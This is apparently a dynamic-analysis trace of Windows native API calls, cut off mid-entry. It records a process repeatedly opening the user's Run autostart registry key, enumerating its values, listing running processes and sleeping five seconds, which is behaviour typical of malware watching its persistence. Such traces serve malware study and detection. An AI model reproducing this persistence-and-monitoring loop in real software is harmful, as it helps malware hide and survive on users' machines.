[0176.589] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.590] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.590] NtClose (Handle=0x274) returned 0x0 [0176.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.598] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.604] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.604] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.605] NtClose (Handle=0x274) returned 0x0 [0176.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.614] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.615] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.615] NtClose (Handle=0x274) returned 0x0 [0176.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.628] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.629] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.629] NtClose (Handle=0x274) returned 0x0 [0176.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.639] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.640] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.640] NtClose (Handle=0x274) returned 0x0 [0176.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.651] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.652] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.652] NtClose (Handle=0x274) returned 0x0 [0176.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.664] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.665] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.666] NtClose (Handle=0x274) returned 0x0 [0176.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.676] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.677] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.677] NtClose (Handle=0x274) returned 0x0 [0176.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.686] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.688] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.689] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.689] NtClose (Handle=0x274) returned 0x0 [0176.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.711] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.712] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.712] NtClose (Handle=0x274) returned 0x0 [0176.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.726] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.729] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.731] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.731] NtClose (Handle=0x274) returned 0x0 [0176.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.747] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.750] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.750] NtClose (Handle=0x274) returned 0x0 [0176.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.776] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.777] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.777] NtClose (Handle=0x274) returned 0x0 [0176.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.797] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.799] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.799] NtClose (Handle=0x274) returned 0x0 [0176.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 